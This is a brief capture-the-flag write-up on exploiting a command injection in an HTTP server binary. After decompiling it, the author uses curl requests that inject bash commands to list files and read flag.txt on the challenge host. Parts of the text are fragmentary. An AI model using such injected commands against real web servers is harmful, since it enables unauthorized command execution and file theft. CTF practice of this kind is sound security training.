Our webserver has a few flaws in it :(
Given file is a binary, which seems to be an implementation of http server.
a.out: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.s o.2, BuildID[sha1]=a0e015bbe044f88bfcc6544ce015aca480b86641, for GNU/Linux 3.2.0, not stripped
And following the instruction…
Ghidra to take a look into decompiled code ;-)
The exploitable part is in
81 line. Looks like the echo from instruction is a system command call and we can put
anything instead of it. Also, in
74-78 lines we can see that
< characters are substituted with
To exploit the finding I’ve used
curl as below.
curl --path-as-is "http://184.108.40.206:8080/?/usr/bin/bash -c 'echo \`ls \`'"
a.out echo flag.txt ynetd
curl --path-as-is "http://220.127.116.11:8080/?/usr/bin/bash -c 'echo \`cat -A flag.txt\`'"